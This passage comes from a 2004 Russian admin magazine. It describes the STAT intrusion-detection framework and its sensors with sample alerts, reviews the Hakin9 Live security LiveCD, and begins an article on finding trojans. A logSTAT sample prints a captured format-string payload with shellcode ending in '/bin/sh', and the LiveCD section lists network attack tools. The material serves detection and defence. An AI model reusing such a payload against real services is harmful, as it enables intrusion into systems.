соров под конкретные условия. Но, несмотря на наличие
препроцессоров, Snort все-таки больше signature IDS, чем
anomaly. Совсем другой подход.
Проект State Transition Analysis Technique (STAT) исполь-
зует несколько иной метод обнаружения угроз. Основан этот
метод на абстракциях, где вместо конкретных деталей ис-
пользуются обобщенные модели атак, которые затем опи-
сываются в возможных сценариях атак. Процесс абстрак-
ции от обычной формы (т.е. простых контрольных записей
или сетевых пакетов) к представлению более высокого
уровня сделан так, чтобы различные действия в системе
статистически независимых низкоуровневых факторов
были по возможности представлены к единому типу. Кро-
ме того, методология STAT поддерживает такой подход мо-
делирования, который представляет только те действия,
которые являются критическими для эффективности ата-
ки в целом.
При этом отход от специфики конкретной атаки делает
возможным обнаруживать ранее неизвестные варианты
атаки или атаки, использующие подобные механизмы, т.е.
подход STAT лишен недостатков, присущих signature-based-
подходу. Методы, заложенные в сценариях STAT, могут быть
применены для создания любого вида датчиков host-based,
network-based и application-based, что делает данную тех-
нологию универсальной. К примеру, два тогда еще концеп-
туальных датчика NetSTAT и USTAT прошли в конце про-
шлого века полевые испытания в MIT Lincoln Laboratory и
Air Force Research Laboratory (AFRL). В ходе которых зас-
лужили высокую оценку, и, главное, была доказана жиз-
ненность предложенных методик обнаружения атак и об-
наружена схожесть путей представления сценариев атак и
архитектуры различных типов датчиков.
Концепции, на которых базируется STAT,
принцип работы
Основу проекта составляют пять понятий:
! State Transition Analysis Technique – STAT;
! язык STATL;
! ядро STAT;
! инструментальные средства STAT;
! инфраструктура MetaSTAT.
№10(23), октябрь 2004
безопасность
Методика анализа смены состояний (STAT) описывает
возможные угрозы как некие сценарии. В сценариях атаки
представлены как последовательности состояний, которые
характеризуют эволюцию состояний защиты системы от на-
чального до скомпрометированного. Описания атак вклю-
чают в себя как минимум две позиции: запускающее initial-
состояние и по крайней мере одно конечное состояние ком-
прометации системы. Так, в сценарии атаки, описывающей
попытку нарушить защиту операционной системы, форму-
лируются утверждения вроде монопольного использования
файла, идентификации или авторизации пользователя, а в
сценарии, описывающем сканирование портов, описыва-
ются типичные действия и сегменты TCP, используемые при
сканировании портов хоста.
Для описания сценариев атаки используется расширя-
емый язык STATL. Вообще надо отметить, в последнее вре-
мя заметен интерес к подобным разработкам и появилось
множество языков, что полностью оправдывает себя, т.к.
появляется возможность выявить общие закономерности,
присущие атакам, произвести их классификацию и анализ
зависимостей среди различных атак, что позволит опозна-
вать скоординированные и растянутые по времени атаки
против компьютерных систем. По крайней мере сейчас из-
вестны шесть категорий «attack languages»: языки собы-
тий, языки реакции, языки отчетов, языки корреляции, язы-
ки эксплоитов и языки детектирования. STATL относится к
последней категории, т.е. к языкам детектирования, кото-
рые имеют соответствующие механизмы и абстракции, по-
зволяющие описать атаку. Сама же атака в STATL пред-
ставляется как последовательность состояний и переходов.
Состояния характеризуют систему в различные моменты
развития атаки. Описывается только необходимое для оп-
ределения атаки (например, атрибуты файловой системы).
Переходы же ассоциируются со специфическими условия-
ми, которые необходимо выполнить для перехода в новое
состояние. Например, после обнаружения бинарных дан-
ных в запросе веб-сервера ожидается открытие еще одно-
го TCP-соединения или запуск приложения. Возможное раз-
витие событий контролируется фильтрами утверждений
перехода, которые определяют более конкретные условия,
которым может соответствовать дальнейшее развитие ата-
ки. Например, открытие соединения только со специфичес-
ким портом или запуск критических приложений. При этом
переходы в зависимости от результата могут приобретать
значение consuming, nonconsuming или unwinding.
STATL включает несколько встроенных типов: int и u_int,
bool, string, timeval (для временных меток) и timer (для от-
слеживания событий в течение определенного интервала
времени ) и также включены массивы. При этом невозмож-
но определить новые типы данных в пределах сценария,
специфические типы должны определяться в ориентирован-
ной на конкретную задачу библиотеке. Поэтому сетевые и
host-датчики кроме встроенных имеют и специфические
типы данных. В документации можно найти примеры пост-
роения сценария на языке STATL, позволяющие более под-
робно разобраться с технологией, в данный же момент все
имеющиеся сценарии и расширения языка STATL, перепи-
саны в код C++ и откомпилированы в библиотеки STAT
development tools, хотя в архивах приложений встречаются
61
 безопасность
ознакомительные сценарии и модули, написанные на язы-
ке STATL, позволяющие самому создать необходимое опи-
сание события. Для возможности разработки и тестирова-
ния собственных сценариев имеются необходимые прило-
жения:
! STATL Parser – инструмент, написанный на Java, позво-
ляет переводить сценарии, написанные на STATL, в сце-
нарий C++ плагинов, который затем можно откомпили-
ровать и загрузить в STAT-based приложение.
! STATed – графический редактор для сценариев STATL,
также реализованный на Java.
! xSTAT – позволяет создать законченное универсальное
STAT-based приложение без необходимости следовать
за одиночным приложением, а фактически все сенсоры
являются символическими ссылками на это имя и лю-
бой можно запустить, набрав xstat с соответствующими
опциями.
Кроме того, в документе «Translating Snort rules to STATL
scenarios» (http://www.cs.ucsb.edu/~rsg/pub/2001_eckmann_
RAID01.pdf.gz) обсужден процесс перевода правил Snort в
сценарии STATL, но, к сожалению, упоминаемой в нем ути-
литы snort2statl на сайте обнаружить не удалось.
STATL позволяет использовать особенности методики
STAT независимо от конкретного приложения и области
применения, т.к. может быть легко адаптирован к различ-
ным целевым средам и также содержит конструкции, кото-
рые могут помочь быстро адаптировать язык к любой спе-
цифической области. Например, расширения STATL для
описания происходящего на основании записей в логах веб-
сервера Apache, имеют поля вроде host, ident, authuser, date,
request, status, bytes и пр.
После определения возможных событий устанавливаются
предикаты, основанные на них. Так, например, isCGIrequest()
возвращает истину в том случае, когда событие – запрос
на выполнение CGI-скрипта; в случае, когда клиенту воз-
вращается ошибка 400-500, истину принимает предикат
isClientError(); а когда в запросе обнаруживаются бинарные
строки, что может свидетельствовать о попытке перепол-
нения буфера, истину принимает предикат isBinary(). Все
события и определения предиката сгруппированы в расши-
рениях языка, и после того как наборы событий и связан-
ные с ними предикаты для расширений языка определены,
их возможно использовать в описаниях сценариев STATL.
Дальнейшая работа системы
по обнаружению атаки
Сценарии STATL обрабатываются во время выполнения
ядром STAT. Для этого сценарии компилируются в Scenario
Plugin, который является динамически загружаемой библио-
текой (.so в UNIX или DLL в Windows). Кроме того, все рас-
ширения языка, использованного в сценариях, должны быть
откомпилированы в Language Extension Module, который
также является динамически загружаемой библиотекой.
Само ядро STAT обеспечивает единые для сценариев па-
раметры вроде таймеров, концепций состояния, перехода
и соответствия события и фактически производит анализ,
сравнивая входящий поток со сценариями, имеющимися в
Scenario Plugins. Для расширения возможностей предусмот-
62
рено расширение ядра за счет добавления модулей, отве-
чающих за анализ определенных событий (сетевой трафик,
логи приложений и событий, отслеживаемых операционной
системой, системные вызовы и пр.), что позволяет собрать
IDS практически под конкретные условия. При этом возмож-
но изменение в процессе выполнения загрузкой/выгрузкой
STAT-based приложений при помощи директив управления,
посланных ядру STAT. Ядро вместе с загруженными моду-
лями и определяет возможности системы. Если же STAT
запущен без модулей, он работает в «пустой» конфигура-
ции, т.к. содержит только образ ядра, ожидающего собы-
тий или сообщений управления. Источник событий обеспе-
чивается модулем Event Provider, который, собирая данные
(т.е. события) из внешней среды (анализ логов, сетевых па-
кетов), фильтрует те, которые не представляют интерес,
преобразовывает остающиеся события в объекты событий
(как определено Language Extension Module), преобразовы-
вает эти события в универсальные события STAT и добав-
ляет эти события во входную очередь ядра STAT.
При этом Event Providers может быть добавлен и удален
динамически, также ядро может работать одновременно с
несколькими Event Provider. Для обработки событий необ-
ходимо загрузить одно или несколько Scenario Plugins в ядро
STAT. Прототипы сценария содержат структуры данных,
представляющие в условленных сценарием терминах со-
стояние и изменение глобальных переменных и набор не-
которых параметров активации. Прототип создает первый
образец сценария. Такой образец находится в начальном
состоянии, соответствующем сценарию атаки. Ядро STAT,
анализируя определенный сценарий, помечает образец для
событий, ассоциированных с начальным состоянием сце-
нария. Теперь ядро готово для обработки события. Если со-
бытие соответствует помеченному, то происходит необхо-
димая оценка и утверждение состояний, и в случае удов-
летворительного ответа принимается решение о соответ-
ствии. При этом, так как могут изменяться последствия, то
может создаваться и новый сценарий. Каждый образец
сценария фактически представляет описание атаки в про-
грессе.
В результате работы сценария в конце может быть вы-
дан некоторый выход. Это может быть регистрация, пре-
дупреждающее сообщение, перестройка firewall, другим ва-
риантом может быть выдача т.н. синтетического события,
которое обрабатывается подобно любому другому событию
и может использоваться, чтобы представить изменения це-
почки сценария. За ответ на событие отвечает Response
Modules, представляющий собой набор функций, способ-
ных реализовать любой необходимый тип реакции, в том
числе и в зависимости от установок и на промежуточные
состояния сценария. Теперь STAT-based приложение пол-
ностью сконфигурировано, необходимые модули в зависи-
мости от потребностей могут быть в любой момент загру-
жены/выгружены, все необходимые зависимости осуществ-
ляются либо самим приложением, либо инфраструктурой
MetaSTAT.
Инфраструктура MetaSTAT
В защищаемой сети развертывается сеть датчиков, состав-
ленная из компонентов, соединенных между собой посред-

ством локальной связи и инфраструктуры управления. Для
контроля работы, координации действий, совместимости и
управления STAT-based приложениями предназначен набор
MetaSTAT, состоящий из:
! CommSTAT – позволяет создавать защищенные соеди-
нения между разнесенными по сети компонентами. Пе-
редаваемые данные форматируются согласно стандар-
ту Intrusion Detection Message Exchange Format (IDMEF),
предложенному Intrusion Detection Working Group (IDWG)
of the Internet Engineering Task Force (http://www.ietf.org/
html.charters/idwg-charter.html), который базируется на
XML. Оригинальный IDMEF распознает два вида собы-
тий: Heartbeat и Alert, который был расширен необходи-
мыми для управления датчиками сообщениями. Для за-
щиты соединения используется SSL.
! STAT Proxy – действует как посредник между STAT-based
приложением и контроллером MetaSTAT, отвечает за
поддержку репозитария host-based модулей STAT, для
соединения с Controller использует CommSTAT. Также
производит предварительную обработку сообщений и
директив управления, и поддерживает интеграцию с
инструментами сторонних разработчиков, не поддержи-
вающих инфраструктуру STAT.
! MetaSTAT Controller – сохраняет соединения к имеющим-
ся STAT proxy и обеспечивает интерфейс, позволяющий
отсылать управляющие сообщения STAT-based прило-
жениям и контролировать их текущее состояние.
! MetaSTAT Viewer – пакет включает приложение, напи-
санное на Java и обеспечивающее графический пользо-
вательский интерфейс, позволяющий просматривать
предупреждения, сохраненные в централизованной базе
данных. В настоящее время Viewer поддерживает про-
смотр IDMEF версии 0.3.
! MetaSTAT Configurator – хранит базу данных задейство-
ванных модулей и датчиков, а также зависимостей меж-
ду ними.
! MetaSTAT Collector – отвечает за сбор и сохранение пре-
дупреждений, собранных управляемыми датчиками. Все
предупреждения IDMEF можно сохранить во внешней
базе данных (MySQL).
Выходы датчиков в форме предупреждений собираются
т.н. мета-сенсорами, каждый такой мета-сенсор отвечает за
подмножество развернутых датчиков и может координировать
действия с другими мета-сенсорами (корреляция результатов,
например). Компоненты MetaSTAT могут быть организова-
ны в иерархической структуре, для возможности разверты-
вания большого количества датчиков в больших сетях.
Инструменты STAT
Принципы, заложенные в STAT, были использованы при
разработке нескольких компонентов, позволяющих собрать
STAT-based IDS под определенные задачи.
! USTAT – первый появившийся датчик, представляет со-
бой host-based IDS, анализирующую контрольные запи-
си, выданные Sun Solaris Basic Security Module (BSM).
! NSTAT – расширение USTAT для работы с несколькими
узлами, позволяет учитывать атаки на узлы, использу-
ющие NFS.
№10(23), октябрь 2004
безопасность
! WinSTAT – также относится к IDS контролирующим от-
дельный узел и предназначен для анализа системных ло-
гов Windows NT для обнаружения следов возможных атак.
! LinSTAT – представляет собой демон контроля происхо-
дящих событий в Linux-системах, для этих целей исполь-
зуется пакет SNARE, разработанный InterSect Alliance
(http://www.intersectalliance.com).
! NetSTAT – относится к сетевым системам обнаружения
атак, анализирует сетевой трафик на предмет наличия
пакетов, содержащих угрозу.
! WebSTAT – application-based IDS, а по сути синтаксичес-
кий анализатор лог-файлов, сгенерированых веб-сер-
вером Apache, позволяющий обнаружить атаки и зло-
намеренные запросы.
! LogSTAT – сенсор, анализирующий журналы формата
UNIX syslog, но имеет библиотеку расширения, позво-
ляющую отслеживать критические записи и в журналах
Apache.
! AlertSTAT – хотя и назван в некоторых документах дат-
чиком, но относится к инструменту анализа выводов дру-
гих датчиков и позволяет обнаруживать атаки более
высокого уровня, в том числе и распределенные и мно-
гоступенчатые атаки.
Установка и работа
Домашняя страница проекта в Интернете находится по ад-
ресу http://www.cs.ucsb.edu/~kemm/netstat.html/projects.html,
здесь вы найдете документацию и собственно сам софт.
Страница для закачки разбита по приложениям, причем если
вы хотите установить только LinSTAT (http://www.cs.ucsb.edu/
~kemm/netstat.html/software/linstat.html), то на этой страни-
це найдете все необходимые компоненты для удовлетво-
рения зависимостей. Доступны как прекомпилированные
rpm-пакеты (для RedHat 7.3), так и исходные тексты. Надо
сказать, что в rpm-пакетах можно найти только базовые при-
ложения, да и то, например, модули ядра будут работать
только с тем ядром, для которого они компилированы, при
использовании в другой системе получите примерно такое
сообщение:
Starting linuxstat services: insmod: error inserting
'/usr/local/stat/sensors/linuxstat_sensor_1.0/auditmodule.o':
-1 Invalid module format
Поэтому наиболее общим вариантом будет установка из
исходников. Как сказано в документации, для установки до-
статочно ввести стандартные ./configure, make, make install
и все. Но при установке MetaSTAT (с остальными приложе-
ниями проблем практически не было) на RedHat 7.3 и 9,
SuSE 9.1, Linux XP, Slackware 9.1, проблемы возникали в
каждом случае (в RedHat 7.3 и Slackware меньше) поэтому,
скорее всего, придется немного повозиться в каждом конк-
ретном случае. Например, такая ошибка преследовала во
всех системах.
checking for libxml/parser.h... no
The STAT Core needs libxml2 headers installed before it can be compiled
(note that a link called "libxml" and pointing to "libxml2/libxml" is needed)
Но libxml установлен, ищем, где:
# find /usr /opt -name parser.h
/usr/include/libxml2/libxml/parser.h
63
 безопасность
Исправить ситуацию можно так:
# ln -s /usr/include/libxml2/libxml /usr/include/libxml
После этого:
checking for pthread.h... yes
checking libxml/parser.h usability... yes
checking libxml/parser.h presence... yes
checking for libxml/parser.h... yes
Проблема с glib в SuSE решилась таким образом:
MetaSTAT needs glib installed before it can be compiled
configure: error: /bin/sh './configure' failed for MetaSTAT
# ln -s /usr/lib/libglib-1.2.so.0.0.10 /usr/lib/libglib-1.2.so
А еще:
# ln -s /opt/gnome/lib/libgnome.so.32.4.3 ↵
/opt/gnome/lib/libgnome.so.0
# ln -s /usr/lib/libcrypto.so.0.9.7 /usr/lib/libcrypto.so.2
# ln -s /usr/lib/libssl.so.0.9.7 /usr/lib/libssl.so.2
Смысл, думаю, ясен. Хотя от MetaSTAT можно поначалу
отказаться вообще и установить позднее, все компоненты
можно использовать отдельно без централизованного уп-
равления. А так скачиваем необходимые сенсоры и распа-
ковываем командой tar xzvf название_пакета. После чего в
текущем каталоге образуется подкаталог STAT-1.0. При за-
дании команды ./configure без дополнительных парамет-
ров будут найдены все распакованные сенсоры, они нахо-
дятся в STAT-1.0/Sensors/ и можно установить любой из
них, просто зайдя в нужный каталог и дав необходимые
команды. Либо можно отменить автодетектирование, до-
бавив опцию --disable-autodetect, и затем указать на нуж-
ные сенсоры (например, --enable-netstat, --enable-linstat),
и нелишней будет опция --enable-java для компиляции Java-
компонентов. После компиляции и установки появится
каталог /usr/local/stat/, в котором собраны все библиотеки
сценариев и основные настройки сенсоров. Большинство
файлов не требует вмешательства. Для более точной под-
стройки некоторых датчиков загляните в подкаталог
providers, где в подкаталогах соответствующих датчиков
найдете файл provider_config.
Например, в файле /usr/local/stat/providers/apache_
provider_1.0/provider_config по умолчанию такая запись
use_command_line_args, свидетельствующая о том, что па-
раметры берутся с командной строки. А в linuxstat_provider_
1.0/provider_config занесены файлы и каталоги, доступ к ко-
торым будет контролироваться сенсором LinSTAT.
Теперь конкретней о некоторых сенсорах и сопутствую-
щих приложениях. Как уже говорилось выше, LinSTAT явля-
ется версией утилиты аудита системы SNARE (System iNtrusion
Analysis and Reporting Environment) с уже настроенными па-
раметрами контроля. После установки в вашем распоряже-
нии будет динамически загружаемый модуль ядра
auditmodule.o и три утилиты auditdaemon, linuxstat и praudit.
Модуль, работая в пространстве ядра, отлавливает крити-
ческие системные вызовы вроде «execve» (выполнение ко-
манды), «open» (открыть файл), «mkdir» (создать каталог) и
отправляет результат к подпрограмме, которая собирает всю
64
информацию относительно процесса и пользователя, его
запустившего, или просто попытавшегося выполнить рас-
сматриваемый системный вызов. Модуль сохраняет инфор-
мацию во временном буфере, который может быть прочитан
при помощи auditdaemon или linuxstat. Эти две программы
по сути являются пользовательским интерфейсом к
auditmodule.o, считываются данные через устройство /proc/
audit. При этом auditdaemon собирает все данные и сохраня-
ет их в бинарном формате в файл (по умолчанию /var/log/
snare/audit), для того чтобы просмотреть события, ее можно
извлечь при помощи praudit.
#auditdaemon -o /var/log/snare/audit-`date -I`
#praudit -c /var/log/snare/audit-2004-09-02
...
EVENT #26: act: READ, time: Thu Sep 2 17:46:59 2004, retcode: 2,
exec_args: gpm, pathname: /usr/sbin/gpm, uid: 0, gid: 0, euid: 0, egid: 0,
pid: 991, ppid: 1, pwd: /, objname: /dev/tty0, owner: 0, gowner: 0,
inode: 36763, dev: 770, perm:rw—w----
...
End of file /var/log/snare/audit (33 events in 4335 bytes:
131.36 bytes/event)
Утилита linuxstat работает в двух режимах live и offline.
В режиме live информация берется непосредственно с /proc/
audit и сразу же анализируется сценариями STAT, в offline
анализируется файл, созданный auditdaemon.
В live-режиме программу можно запустить так:
#linuxstat -name LinSTAT:1.0 -hostname localhost -live
А в offline так:
#linuxstat -name LinSTAT:1.0 -hostname localhost ↵
-offline /var/log/snare/audit-2004-09-02
Для примера пробуем занести новые данные в файл /etc/
passwd, в live-режиме система сразу же выдает предупреж-
дающее сообщение.
LinSTAT:1.0@09/02/2004 21:32:36: LOG: linux_restricted_write: 500:
/etc/passwd written by
user 500, program /bin/bash
LinSTAT:1.0@09/02/2004 21:32:36: LOG:
<IDMEF-Message version="0.3">
<Alert ident="grinder-uUg3vo5" impact="attempted-admin">
<CreateTime ntpstamp="0xC4E1E5C4.0x6AFB1CF5">
2004-09-02T18:32:36Z</CreateTime>
<Classification origin="unknown">
<name>restricted_dir_write</name>
<url>http://www.cs.ucsb.edu/~rsg/STAT</url>
</Classification>
<Analyzer analyzerid="LinSTAT:1.0:192.168.1.1">
<Process><name>LinSTAT:1.0</name>
</Process><Node><Address category="ipv4-addr">
<address>192.168.1.1</address>
</Address></Node></Analyzer>
<Source spoofed="unknown">
<User><UserId type="current-user">
<name>sergej</name>
<number>500</number>
</UserId>
<UserId type="current-group">
<name>500</name></UserId></User>
<Process><name>bash</name>
<path>/bin/bash</path>
<pid>22002</pid></Process>
</Source>
<Target><Process><name></name>
<path>/etc/passwd</path></Process></Target>
<AdditionalData type="string" meaning="ustat:target_directory">
/etc/</AdditionalData>
<AdditionalData type="string" meaning="ustat:target_file">

passwd</AdditionalData>
</Alert>
</IDMEF-Message>
Для запуска при старте системы используется скрипт
/etc/init.d/linstat, который берет данные из файла /etc/sysconfig/
linuxstat. В этих файлах можно изменить параметры запуска
и месторасположение исполняемых и файлов отчетов.
# /etc/init.d/linstat start_lin
LinSTAT:1.0@09/02/2004 15:37:54: LOG: <IDMEF-Message>
<x-stat from="xstat@localhost" to="stat-controller@ahost.stattest.com">
<x-stat_info id="1" return_value="0" return_string="OK"
scenario_id="2">
</x-stat_info>
</x-stat>
</IDMEF-Message>
Сенсор webSTAT анализирует логи веб-сервера Apache,
после установки будет доступна только одна утилита –
webstat, которая и принимает в качестве аргумента лог-
файл. Работает также в двух режимах offline и live. Первый
реализуется опцией [-auditfile | -a]:
# webstat -a /var/log/apache2/access_log
Второй при помощи опции [-interface | -i]:
#webstat -i /var/log/apache2/access_log
Теперь для контроля работы набираем в строке браузера:
http://server/cgi-bin, после чего система выдает сообщение:
webstat@localhost@08/26/2004 11:36:18: LOG: apache_regex_xml:
26/Aug/2004:11:36:18 +0300 : First Bad Request "GET
/cgi-bin/ HTTP/1.1" :From 192.168.0.1
:Attack: cgi_dir
При повторной попытке:
webstat@localhost@08/26/2004 11:37:34: LOG: apache_regex_xml:
26/Aug/2004:11:37:34 +0300 : Subsequent Bad Request "GET
/cgi-bin/ HTTP/1.1" :From
192.168.0.1 :Attack: cgi_dir
Обратите внимание, что система различает первую и
последующие попытки одной и той же атаки.
Использование сенсора logSTAT аналогично предыду-
щему:
#logstat -i /var/log/messages -i /var/log/secure
либо:
#logstat -a /var/log/messages -a /var/log/secure
[Sun Aug 29 10:01:56 2004] : Facility : kernel: First Occurance : eth0:
setting promiscuous mode.
logstat@localhost@29/08/2004 12:01:57: LOG: syslog_watch:
[Sun Aug 29 11:01:16 2004]: Facility : sshd[7717]: First Occurance :
failed password for root
from 192.168.0.20 port 22 ssh2
[Sun Aug 29 11:01:16 2004]: Facility : server[23101]:
Subsequent Occurance : dispatch_input:
bad request line
'aa~m?~n?~o?~p?%.236u%304$n%.217u%305$n%.6u%306$n%.192u%
307$n~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~
p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~
p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~
p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~
№10(23), октябрь 2004
безопасность
p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~
p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~
p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~
p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~
p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~p~
p~p~p~p~p~p~p~p~p~p1???^g?_~mo^g~mq^l~iq^d~mq^\~iq^h
~ia^\1?i^q1?a^\^pf?@?@y^l^bu^d<^at^m?@^a}???~@~i??0??@?@^cu?
i1??hc^g~i[^h~mk^h~ic^l^k?@1??~@?t/bin/sh'
logstat@localhost@01/09/2004 22:13:04: LOG: syslog_bufferoverflow:
Датчик NetSTAT также может работать в двух режимах.
Если запустить с указанием сетевого интерфейса, то будут
контролироваться проходящие через него пакеты:
#netstat -i eth0
Got UDP port unreachable
192.168.0.1 48361 -> 192.168.0.20 1
Inside tcpprobe, generating Half Open event
attacker: 192.168.0.1, attackerport: 48370, victim: 192.168.0.1,
victimport:22
<response sensor="netstat@localhost" scenario="proto_30"
scenario_id="201" instance_id="665"
from="logging" transition"inactive" to="end">
<data>CLASSIFICATION_NAME="tcpsweep"</data>
<data>CLASSIFICATION_URL="http://www.cs.ucsb.edu/~rsg"</data>
<data>SOURCE_NODEADDRESS="192.168.0.1"</data>
<data>SOURCE_PORT="48361"</data>
<data>TARGET_NODEADDRESS="192.168.0.20"</data>
<data>ADDITIONAL_DATA="Alert only contains last attacker"</data>
<data>threshold="3"</data>
<data>timeout="3"</data>
<data>victims=""</data>
<data>victim_address="335587520"</data>
<data>total_probed="1488"</data>
<data>addr_probes=""</data>
<data>t1="1"</data>
</response>
И как входные данные можно использовать информа-
цию, собранную внешней утилитой, например tcpdump.
#netstat -a tcpdump_file
Для удобства параметры можно занести в provider_config:
interface eth0
или
auditfile /audit/file.tcpdump
Принцип работы остальных сенсоров STAT аналогичен
и, думаю, ясен.
К сожалению, STAT только-только выбрался из концеп-
туального состояния и еще не успел обзавестись полноцен-
ными средствами сбора и вывода данных, так что их при-
дется создавать самому, а поэтому о массовом использо-
вании разговор пока не идет. Проведенные тестовые ис-
пытания подтвердили жизненность методики STAT, были
обнаружены не только уже известные атаки, но и тестиро-
вались уязвимости обнаруженные, после того как система
была установлена, но все равно в отчетах одного из сенсо-
ров появлялось предупреждающее сообщение. В этом про-
является одна из основных достоинств STAT, т.е. работаю-
щая IDS фактически не требует никаких обновлений и мо-
жет эксплуатироваться большой промежуток времени без
внимания администратора. Остается надеяться, что нара-
ботки не пропадут даром. Успехов.
65
 администрирование
HAKIN9 LIVE
Появление LiveCD-дистрибутивов GNU/Linux не только по-
радовало поклонников этой системы, но и было оценено
администраторами, отвечающими за безопасность сети.
Конечно же, можно нанять для этой цели и специалистов
со стороны, что в принципе более правильно, т.к. при по-
мощи сканеров все равно невозможно выявить все недо-
статки, но не все могут позволить себе такую роскошь. Да
и следить за безопасностью необходимо не время от вре-
мени, а постоянно, и поэтому хочется иметь готовый инст-
румент, позволяющий оценить все самому. LiveCD-дист-
рибутивы позволяют сделать необходимый инструмент
буквально на все случаи жизни, и эта особенность не мог-
ла остаться незамеченной у специалистов по компьютер-
ной безопасности.
Польский журнал Hakin9 ориентирован на читателя, от-
вечающего за защиту компьютерных систем, программис-
тов, специалистов по безопасности и администраторов, а
также на людей, занимающихся проблемами безопасности
компьютеров и сетей в свободное время. Предлагаемый им
дистрибутив Hakin9 Live (http://www.haking.pl/en/index.php?
page=hakin9_live), основанный на другом польском дистри-
бутиве Aurox Live (http://www.aurox.org/en), содержит все
необходимые инструментальные средства и материалы, не-
обходимые для проверки на практике методик и техноло-
гий, описанных в статьях журнала. И для этого дистрибу-
тив включает в себя огромный набор утилит и инструмен-
тов для тестирования систем на уязвимость (как локаль-
ных, так и удаленных).
В использовании Hakin9 Live в принципе не очень отли-
чается от других подобных дистрибутивов, необходимо ска-
66
СЕРГЕЙ ЯРЕМЧУК
чать с одного из зеркал, указанных на сайте, iso-образ раз-
мером 300 Мб, записать его на болванку и загрузиться,
присутствие жесткого диска необязательно. При загрузке
можно передать ядру некоторые параметры, например, ре-
жим загрузки framebuffer fb800 и fb1024 или без него nofb,
текстовый режим – text и прочие. Но в большинстве случа-
ев вмешательство пользователя необязательно. Необходи-
мо отметить, что локализован Hakin9 Live пока только на
польский (по умолчанию), немецкий, французский, испанс-
кий, чешский, но русский язык в списке отсутствует. Не
знаю, считать ли это недостатком, все равно большая часть
предлагаемых утилит консольные, и знание английского в
подобных случаях просто обязательно. Начиная с версии
2.0, в дистрибутиве используется оконный менеджер XFce4,
в более ранних – fluxbox. После загрузки необходимо заре-
гистрироваться как пользователь root или haking без паро-
ля. Помнится, как распекали SuSE Linux 9.1 LiveCD именно
по этой причине, поэтому, если планируется работа в Интер-
нете, обязательно установите пароль при помощи passwd,
иначе проникнуть в компьютер труда особого не составит.
Дистрибутив поддерживает большинство сетевых устройств,
и некоторые пытается настроить автоматически. Если сеть
не удалось настроить при помощи DHCP, настраиваем ее
вручную. Для этого воспользуемся командами ifconfig и
route.
#ifconfig eth0 192.168.0.20 netmask 255.255.255.0
#route add default gw 192.168.0.254
И заносим в /etc/resolv.conf имя ближайшего сервера
имен. Например:

nameserver 192.168.0.254
Те, кто не привык к ручной набивке команд, могут вос-
пользоваться графическими netconfig, netcardconfig или
redhat-config-network.
После чего выполняем.
#/etc/init.d/network restart
Aurox Live базируется на RedHat, и поэтому в Hakin9 Live
можно найти конфигурационные утилиты, специфичные для
данного дистрибутива, в том числе возможно использова-
ние rpm, но именно по этой причине этот дистрибутив мо-
жет подойти новичкам, еще не знающим всех тонкостей
UNIX-систем. Особенностью дистрибутива является отсут-
ствие автоматического сохранения настроек, поэтому о со-
хранении всего необходимого придется позаботиться са-
мому, сохранив их на дискету или в любой раздел жесткого
диска, которые автоматически система находит и монтиру-
ет при загрузке.
Ссылки на все основные инструменты для удобства
пользователя собраны в каталоге /usr/local/bin/tools/, куда
можно перейти в том числе и из отдельного пункта меню.
Здесь полный набор, включающий наработки известных
хакерских групп:
! Утилиты анализа защищенности и работы в сети: iptables,
tcpdump, tcpflow, tcpslice, сканеры – nmap с nmapfe, amap
(Application MAPper), gps (Ghost Port Scan, хорошая ути-
лита для проверки правил firewall), exscan, siphon, nbtscan,
jwhois, iptraf (IP Network Statistics Utility), nessus, Snort,
№10(23), октябрь 2004
администрирование
strobe, traceroute, ethereal, tethereal, cold (Computerized
Ordinary LAN Dumper), p0f, panda309 (простая скорост-
ная утилита для удаленного определения ОС), sentinel,
vmap, mtr, fping, hping2, hping3, queso, dnstracer, arp, arping,
arp-watch, ether-wake, netcat, ftp, ssh, веб-браузеры Links
и Mozilla Firebird, набор утилит для работы с kerberos.
! Утилиты анализа и повышения защищенности систе-
мы – john the ripper, позволяющий оценить пароли на
прочность, весь набор утилит The Coroner’s Toolkit с ин-
струментом визуализации Autopsy Forensic Browser, о
котором журнал уже писал.
И конечно же, найдете все утилиты, присущие любой
Linux-системе, что позволяет использовать Hakin9 Live и
для спасательных целей. И в дополнение целый ряд дру-
гих не менее интересных утилит, например стенографи-
ческая утилита MP3Stego (http://www.cl.cam.ac.uk/~fapp2/
steganography/mp3stego/), позволяющая спрятать информа-
цию в музыкальный mp3-файл. Разработчики полностью
сохранили документацию в виде man-страниц плюс напи-
сали свою, что позволяет быстро разобраться в работе с
системой и незнакомыми утилитами, но на сайте, к сожа-
лению, информации практически нет.
Вот кратко и все. Сравнивать с другими подобными ди-
стрибутивами смысла, я думаю, нет, т.к. каждый из них ори-
ентирован под определенные задачи и соответственно
пользователя, который будет с ним работать. Это доволь-
но хороший и удобный инструмент администратора и для
пользователей, желающих освоиться в UNIX или желающих
разобраться в проблемах безопасности.
67
 безопасность
ПОИСК ТРОЯНОВ ВРУЧНУЮ
В этой статье вы найдете ответы на следующие вопросы:
! Что делать, если вы предполагаете, что на вашем ком-
пьютере с Windows установлена программа-шпион или
троян?
! Как найти троянскую программу или spyware, если ваш
антивирус или AdWare ее не находит?
Статья для начинающих системных администраторов и
опытных пользователей Windows описывает возможные спо-
собы поиска троянских программ и также описывает, как ис-
пользовать для этого поиска программы и утилиты из стан-
дартной поставки Windows 2000, XP и 2003 и программы
сторонних разработчиков: netstat, msconfig, msinfo32, tlist,
Sysinternals TCPView, CurrPorts, WinTasks, Security Task
Manager, Starter, Winpatrol, Sysinternals Autoruns, Sysinternals
ProcessExplorer, MoveOnBoot, Microsoft PortReporter, System
